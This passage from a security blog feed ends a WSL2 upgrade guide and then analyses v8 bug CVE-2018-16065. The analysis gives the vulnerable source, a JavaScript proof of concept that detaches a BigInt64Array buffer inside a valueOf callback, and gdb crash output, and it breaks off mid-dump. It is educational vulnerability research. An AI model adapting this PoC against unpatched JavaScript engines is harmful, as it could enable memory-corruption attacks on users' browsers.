WSL2</h2><ul><li><p><strong>WSL2 can run 32-bit programs directly</strong> (thanks to <a href="https://mundi-xu.github.io/">@mudi-xu</a> for the tip), so ideally we want to upgrade WSL1 to WSL2 in place, without reinstalling the existing Ubuntu system.</p></li><li><p>Note, however, that WSL2 is only available on builds <strong>18917</strong> and later. Run <code>winver</code> to check your <strong>OS build</strong>; if it is too old, you need to update Windows first. (I am about to update Windows now, sob.)</p></li><li><p>The steps are as follows:</p><ul><li>First, run <code>dism.exe /online /enable-feature /featurename:VirtualMachinePlatform /all /norestart</code> with <strong>administrator privileges</strong> to <strong>enable the “Virtual Machine Platform” optional feature</strong>, then <strong>restart</strong> the computer.</li><li>After the restart, run <code>wsl --list --verbose</code>  to see the current WSL distributions and their versions.</li><li>Download and install the <a href="https://wslstorestorage.blob.core.windows.net/wslblob/wsl_update_x64.msi">WSL2 Linux kernel update package for x64 machines</a>.</li><li>Then run <code>wsl --set-version &lt;SubSystemName&gt; 2</code> to upgrade the distribution from WSL1 to WSL2. This may take a few minutes.</li><li>Once the upgrade finishes, run <code>wsl --list --verbose</code> again to check the WSL distributions and their versions.</li><li>Finally, run <code>wsl --set-default-version 2</code> so that any Linux distribution installed afterwards uses WSL2.</li></ul></li><li><p>Caveat: WSL2 is <strong>incompatible</strong> with VMware 15. If you need both, be sure to upgrade VMware to <strong>version 16</strong>.</p><blockquote><p>You do not need to uninstall the previous version when upgrading VMware; just run the new installer.</p><p>During the upgrade, be sure to check <strong>Enable Windows Hypervisor Platform</strong> so that WSL2 and VMware can coexist.</p></blockquote></li><li><p>While using WSL2 you may hit the error <strong>参考的对象类型不支持尝试的操作</strong> (“The attempted operation is not supported for the type of object referenced”).</p><p><img src="/2021/04/i386_WSL64/image-20210430132003438.png" alt="img"></p><p>There are two fixes:</p><ul><li><p>Option 1 (not recommended): run <code>netsh winsock reset</code> to reset Winsock, then reboot. This is only a temporary fix.</p></li><li><p>Option 2 (recommended): download <a href="/2021/04/i386_WSL64/NoLsp.zip" title="NoLsp.exe">NoLsp.exe</a> and run the following command with administrator privileges:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">NoLsp.exe c:\windows\system32\wsl.exe</span><br></pre></td></tr></table></figure><p>Once <code>Success!</code> appears, WSL2 works normally.</p><p><img src="/2021/04/i386_WSL64/image-20210430132628877.png" 
alt="img"></p></li></ul><p>Why does option 2 take such an unusual form? The Proxifier developers found that wsl.exe shows this error whenever a Winsock LSP DLL is loaded into its process. The simplest fix is therefore to call the WSCSetApplicationCategory WinAPI for wsl.exe to prevent that from happening.</p><p>That call creates an entry for wsl.exe under <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\AppId_Catalog</code>:</p><p><img src="/2021/04/i386_WSL64/image-20210430132755231.png" alt="img"></p><p>And that is the technical detail behind option 2.</p></li><li><p>References</p><ul><li><a href="https://docs.microsoft.com/zh-cn/windows/wsl/install-win10">适用于 Linux 的 Windows 子系统安装指南 (Windows 10) - microsoft docs</a></li><li><a href="https://blog.csdn.net/weixin_40955163/article/details/100555823">WSL安装及升级WSL2 - CSDN</a></li><li><a href="https://github.com/microsoft/WSL/issues/4177#issuecomment-597736482">Winsock module breaks WSL2 - WSL github issue</a></li></ul></li></ul>]]></content>
    
    
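    <summary type="html">&lt;p&gt;Running 32-bit x86 programs under WSL1 is fairly difficult: it takes many steps and has limitations.&lt;/p&gt;
&lt;p&gt;WSL2 can run x86 programs directly, but you have to upgrade to it from WSL1.&lt;/p&gt;
&lt;p&gt;Both routes are rather tedious, so this post records some of the detours I took.&lt;/p&gt;</summary>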
    
    
    
    
    <category term="wsl" scheme="https://kiprey.github.io/tags/wsl/"/>
    
  </entry>
  
  <entry>
    <title>CVE-2018-16065 Analysis</title>
    <link href="https://kiprey.github.io/2021/03/CVE-2018-16065/"/>
    <id>https://kiprey.github.io/2021/03/CVE-2018-16065/</id>
    <published>2021-03-03T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.750Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、前言">1. Preface</h2><p>CVE-2018-16065 is a vulnerability inside v8's <code>EmitBigTypedArrayElementStore</code> function. After checking whether the corresponding ArrayBuffer has been detached (i.e. whether it is <code>neutered</code>), the function calls <code>ToBigInt</code>, which has <strong>side effects</strong> (that is, it <strong>can invoke user JS callback code</strong>). Inside that callback, the user can turn the BigIntArray that just passed the check (a <strong>TypedArray that is not neutered</strong>) into a <code>neutered</code> one.</p><p>As a result, some data is illegally written to an ArrayBuffer that has already been detached. If the GC then tries to reclaim that ArrayBuffer's backing store, it triggers a crash.</p><span id="more"></span><h2 id="二、环境搭建">2. Environment setup</h2><p>Check out the affected v8 version, then build:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">git checkout 6.8.275.24</span><br><span class="line">gclient <span class="built_in">sync</span></span><br><span class="line">tools/dev/gm.py x64.debug</span><br></pre></td></tr></table></figure><h2 id="三、漏洞细节">3. Vulnerability details</h2><ul><li><p>When the JS function <code>BigInt64Array.of</code> runs, v8 calls the following <code>Builtin_TypedArrayOf</code> function:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span 
class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// ES6 #sec-%typedarray%.of</span></span><br><span class="line"><span class="built_in">TF_BUILTIN</span>(TypedArrayOf, TypedArrayBuiltinsAssembler) &#123;</span><br><span class="line">  TNode&lt;Context&gt; context = <span class="built_in">CAST</span>(<span class="built_in">Parameter</span>(BuiltinDescriptor::kContext));</span><br><span class="line">  [...]</span><br><span class="line">  <span class="built_in">DispatchTypedArrayByElementsKind</span>(</span><br><span class="line">      elements_kind,</span><br><span class="line">      [&amp;](ElementsKind kind, <span class="type">int</span> size, <span class="type">int</span> typed_array_fun_index) &#123;</span><br><span class="line">        TNode&lt;FixedTypedArrayBase&gt; elements =</span><br><span class="line">            <span class="built_in">CAST</span>(<span class="built_in">LoadElements</span>(new_typed_array));</span><br><span class="line">        <span class="built_in">BuildFastLoop</span>(</span><br><span class="line">            <span class="built_in">IntPtrConstant</span>(<span class="number">0</span>), length,</span><br><span class="line">            [&amp;](Node* index) &#123;</span><br><span class="line">              TNode&lt;Object&gt; item = args.<span class="built_in">AtIndex</span>(index, INTPTR_PARAMETERS);</span><br><span class="line">              TNode&lt;IntPtrT&gt; intptr_index = <span class="built_in">UncheckedCast</span>&lt;IntPtrT&gt;(index);</span><br><span class="line">              <span class="comment">// If the current TypedArray is a BigIntArray,</span></span><br><span class="line">              <span class="keyword">if</span> (kind == BIGINT64_ELEMENTS || kind == BIGUINT64_ELEMENTS) &#123;</span><br><span class="line">                <span class="comment">// the remaining work is done inside EmitBigTypedArrayElementStore</span></span><br><span class="line">                <span 
class="built_in">EmitBigTypedArrayElementStore</span>(new_typed_array, elements,</span><br><span class="line">                                              intptr_index, item, context,</span><br><span class="line">                                              &amp;if_neutered);</span><br><span class="line">              &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                [...]</span><br><span class="line">              &#125;,</span><br><span class="line">            <span class="number">1</span>, ParameterMode::INTPTR_PARAMETERS, IndexAdvanceMode::kPost);</span><br><span class="line">      &#125;);</span><br><span class="line">  [...]</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>For TypedArrays of the BigIntArray kind, v8 goes on to call <code>EmitBigTypedArrayElementStore</code> from this function and completes the remaining work there.</p></li><li><p><code>EmitBigTypedArrayElementStore</code> is fairly simple. Here is its source:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">CodeStubAssembler::EmitBigTypedArrayElementStore</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">    TNode&lt;JSTypedArray&gt; object, TNode&lt;FixedTypedArrayBase&gt; elements,</span></span></span><br><span class="line"><span class="params"><span class="function">    TNode&lt;IntPtrT&gt; 
intptr_key, TNode&lt;Object&gt; value, TNode&lt;Context&gt; context,</span></span></span><br><span class="line"><span class="params"><span class="function">    Label* opt_if_neutered)</span> </span>&#123;</span><br><span class="line">  <span class="keyword">if</span> (opt_if_neutered != <span class="literal">nullptr</span>) &#123;</span><br><span class="line">    <span class="comment">// Check if buffer has been neutered.</span></span><br><span class="line">    Node* buffer = <span class="built_in">LoadObjectField</span>(object, JSArrayBufferView::kBufferOffset);</span><br><span class="line">    <span class="built_in">GotoIf</span>(<span class="built_in">IsDetachedBuffer</span>(buffer), opt_if_neutered);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="comment">// Get the BigInt; ToBigInt calls the JS [Object.valueOf] function</span></span><br><span class="line">  TNode&lt;BigInt&gt; bigint_value = <span class="built_in">ToBigInt</span>(context, value);</span><br><span class="line">  TNode&lt;RawPtrT&gt; backing_store = <span class="built_in">LoadFixedTypedArrayBackingStore</span>(elements);</span><br><span class="line">  TNode&lt;IntPtrT&gt; offset = <span class="built_in">ElementOffsetFromIndex</span>(intptr_key, BIGINT64_ELEMENTS,</span><br><span class="line">                                                 INTPTR_PARAMETERS, <span class="number">0</span>);</span><br><span class="line">  <span class="built_in">EmitBigTypedArrayElementStore</span>(elements, backing_store, offset, bigint_value);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>It is easy to see that if the BigIntArray's ArrayBuffer is neutered, control jumps straight to the given Label for error handling and execution does not continue; in other words, <strong>nothing is written to the backing_store</strong>.</p><p>But <code>ToBigInt</code> is a bit special: it calls the function stored in the object's valueOf property to obtain the value, and <strong>that function can be defined by the user</strong>. If that function neuters the ArrayBuffer of the current BigIntArray, the store that follows writes its data into the ArrayBuffer that was just detached. This is an illegal operation: if the GC then tries to reclaim that 
ArrayBuffer's backing store, the GC will crash.</p></li><li><p>The meaning of <code>neutered</code> needs some explanation: what kind of ArrayBuffer counts as neutered, and how do you make an array neutered?</p><ul><li><p>According to the <a href="https://v8docs.nodesource.com/node-10.15/d5/d6e/classv8_1_1_array_buffer.html#ab73b5545800351ec54c4c0ac002f9d81">v8 docs</a>, the Neuter operation sets the length of the buffer and of all typed arrays to 0, which prevents JavaScript from accessing the underlying backing_store.</p></li><li><p>Next, look at a Runtime function in v8, <code>ArrayBufferNeuter</code>:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">RUNTIME_FUNCTION</span>(Runtime_ArrayBufferNeuter) &#123;</span><br><span class="line">  <span class="function">HandleScope <span class="title">scope</span><span class="params">(isolate)</span></span>;</span><br><span class="line">  <span 
class="built_in">DCHECK_EQ</span>(<span class="number">1</span>, args.<span class="built_in">length</span>());</span><br><span class="line">  Handle&lt;Object&gt; argument = args.<span class="built_in">at</span>(<span class="number">0</span>);</span><br><span class="line">  <span class="comment">// This runtime function is exposed in ClusterFuzz and as such has to</span></span><br><span class="line">  <span class="comment">// support arbitrary arguments.</span></span><br><span class="line">  <span class="comment">// This function only accepts ArrayBuffer arguments; any other type raises an exception</span></span><br><span class="line">  <span class="keyword">if</span> (!argument-&gt;<span class="built_in">IsJSArrayBuffer</span>()) &#123;</span><br><span class="line">    <span class="built_in">THROW_NEW_ERROR_RETURN_FAILURE</span>(</span><br><span class="line">        isolate, <span class="built_in">NewTypeError</span>(MessageTemplate::kNotTypedArray));</span><br><span class="line">  &#125;</span><br><span class="line">  Handle&lt;JSArrayBuffer&gt; array_buffer = Handle&lt;JSArrayBuffer&gt;::<span class="built_in">cast</span>(argument);</span><br><span class="line">  <span class="comment">// If the current ArrayBuffer cannot be neutered, there is nothing more to do; return immediately</span></span><br><span class="line">  <span class="keyword">if</span> (!array_buffer-&gt;<span class="built_in">is_neuterable</span>()) &#123;</span><br><span class="line">    <span class="keyword">return</span> isolate-&gt;<span class="built_in">heap</span>()-&gt;<span class="built_in">undefined_value</span>();</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="comment">// If the ArrayBuffer's backing_store is null, check that its length is 0. This step detects an ArrayBuffer that is already neutered.</span></span><br><span class="line">  <span class="keyword">if</span> (array_buffer-&gt;<span class="built_in">backing_store</span>() == <span class="literal">nullptr</span>) &#123;</span><br><span class="line">    <span class="built_in">CHECK_EQ</span>(Smi::kZero, 
array_buffer-&gt;<span class="built_in">byte_length</span>());</span><br><span class="line">    <span class="keyword">return</span> isolate-&gt;<span class="built_in">heap</span>()-&gt;<span class="built_in">undefined_value</span>();</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="comment">// Shared array buffers should never be neutered.</span></span><br><span class="line">  <span class="built_in">CHECK</span>(!array_buffer-&gt;<span class="built_in">is_shared</span>());</span><br><span class="line">  <span class="built_in">DCHECK</span>(!array_buffer-&gt;<span class="built_in">is_external</span>());</span><br><span class="line">  <span class="comment">// About to neuter: first grab the backing_store pointer and the current ArrayBuffer length</span></span><br><span class="line">  <span class="type">void</span>* backing_store = array_buffer-&gt;<span class="built_in">backing_store</span>();</span><br><span class="line">  <span class="type">size_t</span> byte_length = <span class="built_in">NumberToSize</span>(array_buffer-&gt;<span class="built_in">byte_length</span>());</span><br><span class="line">  array_buffer-&gt;<span class="built_in">set_is_external</span>(<span class="literal">true</span>);</span><br><span class="line">  <span class="comment">// Remove the current ArrayBuffer from the ArrayBufferTracker</span></span><br><span class="line">  isolate-&gt;<span class="built_in">heap</span>()-&gt;<span class="built_in">UnregisterArrayBuffer</span>(*array_buffer);</span><br><span class="line">  <span class="comment">// Perform the neuter operation</span></span><br><span class="line">  array_buffer-&gt;<span class="built_in">Neuter</span>();</span><br><span class="line">  <span class="comment">// Free the memory occupied by the backing_store</span></span><br><span class="line">  isolate-&gt;<span class="built_in">array_buffer_allocator</span>()-&gt;<span class="built_in">Free</span>(backing_store, byte_length);</span><br><span class="line">  <span class="keyword">return</span> isolate-&gt;<span 
class="built_in">heap</span>()-&gt;<span class="built_in">undefined_value</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">JSArrayBuffer::Neuter</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  <span class="built_in">CHECK</span>(<span class="built_in">is_neuterable</span>());</span><br><span class="line">  <span class="built_in">CHECK</span>(!<span class="built_in">was_neutered</span>());</span><br><span class="line">  <span class="built_in">CHECK</span>(<span class="built_in">is_external</span>());</span><br><span class="line">  <span class="comment">// Drop the current backing store</span></span><br><span class="line">  <span class="built_in">set_backing_store</span>(<span class="literal">nullptr</span>);</span><br><span class="line">  <span class="comment">// Set the current length to 0</span></span><br><span class="line">  <span class="built_in">set_byte_length</span>(Smi::kZero);</span><br><span class="line">  <span class="built_in">set_was_neutered</span>(<span class="literal">true</span>);</span><br><span class="line">  <span class="built_in">set_is_neuterable</span>(<span class="literal">false</span>);</span><br><span class="line">  <span class="comment">// Invalidate the neutering protector.</span></span><br><span 
class="line">  Isolate* <span class="type">const</span> isolate = <span class="built_in">GetIsolate</span>();</span><br><span class="line">  <span class="keyword">if</span> (isolate-&gt;<span class="built_in">IsArrayBufferNeuteringIntact</span>()) &#123;</span><br><span class="line">    isolate-&gt;<span class="built_in">InvalidateArrayBufferNeuteringProtector</span>();</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>A quick read of the source makes it clear that <strong>neutering an ArrayBuffer simply removes its backing store and resets its length field.</strong></p></li></ul><p>To sum up, what neutering does is now clear. If it is not, you can also use <code>%DebugPrint</code> to compare the object before and after neutering.</p><p>Next, let's look at the PoC.</p></li></ul><h2 id="四、PoC">4. PoC</h2><ul><li><p>The PoC is as follows:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// flags: --allow-natives-syntax --expose-gc</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> array = <span class="keyword">new</span> <span class="title class_">BigInt64Array</span>(<span class="number">11</span>);</span><br><span class="line"><span class="comment">// constructor returns the array</span></span><br><span class="line"><span class="keyword">function</span> 
<span class="title function_">constructor</span>(<span class="params"></span>) &#123; <span class="keyword">return</span> array &#125;;</span><br><span class="line"></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">evil_callback</span>(<span class="params"></span>) &#123;</span><br><span class="line">  <span class="title function_">print</span>(<span class="string">&quot;callback&quot;</span>);</span><br><span class="line">  %<span class="title class_">ArrayBufferNeuter</span>(array.<span class="property">buffer</span>);</span><br><span class="line">  <span class="title function_">gc</span>();</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0xdeadbeefn</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> evil_object = &#123;<span class="attr">valueOf</span>: evil_callback&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> root = <span class="title class_">BigInt64Array</span>.<span class="property">of</span>.<span class="title function_">call</span>(</span><br><span class="line">  constructor,</span><br><span class="line">  evil_object</span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"><span class="title function_">gc</span>(); <span class="comment">// trigger</span></span><br></pre></td></tr></table></figure></li><li><p>Analyzing the PoC above, the vulnerability is triggered as follows:</p><ul><li>First, BigInt64Array.of.call is executed. The extra call is there so that the constructor function and the element being stored both operate on the same array.</li><li>Initially the array's backing_store exists, so the ArrayBuffer <strong>neutered</strong> check in v8's <code>EmitBigTypedArrayElementStore</code> function passes and execution enters the <strong>ToBigInt</strong> function.</li><li>ToBigInt obtains the value of the element that was passed in, so it calls evil_object.valueOf, i.e. the JS function evil_callback.</li><li>That function runs the v8 Runtime function <code>%ArrayBufferNeuter</code>, which frees the array's ArrayBuffer 
backing_store.</li><li>After that, the ToBigInt call inside v8's <code>EmitBigTypedArrayElementStore</code> function returns and execution continues, attempting to write the element into the previously saved backing_store.</li><li>Because the ArrayBuffer has already been detached, this write modifies some GC-related metadata on that backing_store, so the final GC run crashes.</li></ul></li></ul><blockquote><p>When <strong>writing a value to a Detached ArrayBuffer</strong>, its heap chunk is still <strong>allocated</strong>, so there is no UaF.</p></blockquote><ul><li><p>gdb shows one of two possible crash outputs:</p><ul><li><p>First case</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span 
class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; r</span><br><span class="line">Starting program: /usr/class/v8/v8/out/x64.debug/d8 --allow-natives-syntax --expose-gc test.js</span><br><span class="line">[Thread debugging using libthread_db enabled]</span><br><span class="line">Using host libthread_db library <span class="string">&quot;/lib/x86_64-linux-gnu/libthread_db.so.1&quot;</span>.</span><br><span class="line">[New Thread 0x7fe86accc700 (LWP 84765)]</span><br><span class="line">[New Thread 0x7fe86a4cb700 (LWP 84766)]</span><br><span class="line">[New Thread 0x7fe869cca700 (LWP 84767)]</span><br><span class="line">[New Thread 0x7fe8694c9700 (LWP 84768)]</span><br><span class="line">[New Thread 0x7fe868cc8700 (LWP 84769)]</span><br><span class="line">[New Thread 0x7fe8684c7700 (LWP 84770)]</span><br><span class="line">[New Thread 0x7fe867cc6700 (LWP 
84771)]</span><br><span class="line">callback</span><br><span class="line"></span><br><span class="line">Thread 1 <span class="string">&quot;d8&quot;</span> received signal SIGSEGV, Segmentation fault.</span><br><span class="line">tcache_get (tc_idx=4) at malloc.c:2951</span><br><span class="line">2951      --(tcache-&gt;counts[tc_idx]);</span><br><span class="line">LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA</span><br><span class="line">─────────────────────────────────────────────────────────────[ REGISTERS ]──────────────────────────────────────────────────────────────</span><br><span class="line"> RAX  0x5606a95b6030 ◂— 0x10000</span><br><span class="line"> RBX  0x4</span><br><span class="line"> RCX  0x5606a95b6018 ◂— 0x10001</span><br><span class="line"> RDX  0x0</span><br><span class="line"> RDI  0x58</span><br><span class="line"> RSI  0x7ffe89539b58 —▸ 0x5606a95d2ef0 —▸ 0x7ffe8953ba10 ◂— 0x5606a95d2ef0</span><br><span class="line"> R8   0xdeadbeef</span><br><span class="line"> R9   0x7ffe89539b6c ◂— 0x89539df800000002</span><br><span class="line"> R10  0x58</span><br><span class="line"> R11  0x58</span><br><span class="line"> R12  0xffffffffffffffa8</span><br><span class="line"> R13  0x5606a95d2fb8 —▸ 0x283c80e82ba9 ◂— 0x283c80e822</span><br><span class="line"> R14  0x5</span><br><span class="line"> R15  0x7ffe8953ab08 —▸ 0x354172782e39 ◂— 0xb1000005ceeae0ae</span><br><span class="line"> RBP  0x58</span><br><span class="line"> RSP  0x7ffe89539990 —▸ 0x7fe86cf8d220 ◂— push   rbp</span><br><span class="line"> RIP  0x7fe86b7227be (malloc+286) ◂— mov    rsi, qword ptr [r8]</span><br><span class="line">───────────────────────────────────────────────────────────────[ DISASM ]───────────────────────────────────────────────────────────────</span><br><span class="line"> ► 0x7fe86b7227be &lt;malloc+286&gt;    mov    rsi, qword ptr [r8]</span><br><span class="line">   0x7fe86b7227c1 &lt;malloc+289&gt;    mov    qword ptr [rax + 0x80], rsi</span><br><span 
class="line">   0x7fe86b7227c8 &lt;malloc+296&gt;    mov    word ptr [rcx], dx</span><br><span class="line">   0x7fe86b7227cb &lt;malloc+299&gt;    mov    qword ptr [r8 + 8], 0</span><br><span class="line">   0x7fe86b7227d3 &lt;malloc+307&gt;    jmp    malloc+184 &lt;malloc+184&gt;</span><br><span class="line">    ↓</span><br><span class="line">   0x7fe86b722758 &lt;malloc+184&gt;    pop    rbx</span><br><span class="line">   0x7fe86b722759 &lt;malloc+185&gt;    mov    rax, r8</span><br><span class="line">   0x7fe86b72275c &lt;malloc+188&gt;    pop    rbp</span><br><span class="line">   0x7fe86b72275d &lt;malloc+189&gt;    pop    r12</span><br><span class="line">   0x7fe86b72275f &lt;malloc+191&gt;    ret    </span><br><span class="line"> </span><br><span class="line">   0x7fe86b722760 &lt;malloc+192&gt;    and    rax, 0xfffffffffffffff0</span><br><span class="line">───────────────────────────────────────────────────────────[ SOURCE (CODE) ]────────────────────────────────────────────────────────────</span><br><span class="line">In file: /build/glibc-TrjWJf/glibc-2.29/malloc/malloc.c</span><br><span class="line">   2946 &#123;</span><br><span class="line">   2947   tcache_entry *e = tcache-&gt;entries[tc_idx];</span><br><span class="line">   2948   assert (tc_idx &lt; TCACHE_MAX_BINS);</span><br><span class="line">   2949   assert (tcache-&gt;entries[tc_idx] &gt; 0);</span><br><span class="line">   2950   tcache-&gt;entries[tc_idx] = e-&gt;next;</span><br><span class="line"> ► 2951   --(tcache-&gt;counts[tc_idx]);</span><br><span class="line">   2952   e-&gt;key = NULL;</span><br><span class="line">   2953   <span class="built_in">return</span> (void *) e;</span><br><span class="line">   2954 &#125;</span><br><span class="line">   2955 </span><br><span class="line">   2956 static void</span><br><span class="line">───────────────────────────────────────────────────────────────[ STACK ]────────────────────────────────────────────────────────────────</span><br><span 
class="line">00:0000│ rsp  0x7ffe89539990 —▸ 0x7fe86cf8d220 ◂— push   rbp</span><br><span class="line">01:0008│      0x7ffe89539998 —▸ 0x7ffe895399e0 —▸ 0x7ffe89539aa0 —▸ 0x7ffe89539de0 —▸ 0x7ffe89539e00 ◂— ...</span><br><span class="line">02:0010│      0x7ffe895399a0 ◂— 0xffffffffffffffff</span><br><span class="line">03:0018│      0x7ffe895399a8 —▸ 0x7fe86bb459d8 ◂— mov    qword ptr [rbp - 0x10], rax</span><br><span class="line">04:0020│      0x7ffe895399b0 ◂— 0x2a100</span><br><span class="line">05:0028│      0x7ffe895399b8 —▸ 0x5606a962c3d0 ◂— 0x0</span><br><span class="line">06:0030│      0x7ffe895399c0 —▸ 0x5606a962c370 ◂— 0x0</span><br><span class="line">07:0038│      0x7ffe895399c8 —▸ 0x5606a962d3f0 —▸ 0x7fe86e241580 —▸ 0x7fe86d76e780 (v8::internal::CodeSpace::~CodeSpace()) ◂— push   rbp</span><br><span class="line">─────────────────────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────────────────────</span><br><span class="line"> ► f 0     7fe86b7227be malloc+286</span><br><span class="line">   f 1     7fe86b7227be malloc+286</span><br><span class="line">   f 2     7fe86bb459d8</span><br><span class="line">   f 3     7fe86d823957</span><br><span class="line">   f 4     7fe86d8209a1</span><br><span class="line">   f 5     7fe86d8168de</span><br><span class="line">   f 6     7fe86d816309 v8::internal::Sweeper::StartSweeperTasks()+857</span><br><span class="line">   f 7     7fe86d7932b7 v8::internal::MarkCompactCollector::Finish()+343</span><br><span class="line">────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────</span><br></pre></td></tr></table></figure></li><li><p>Second case</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span 
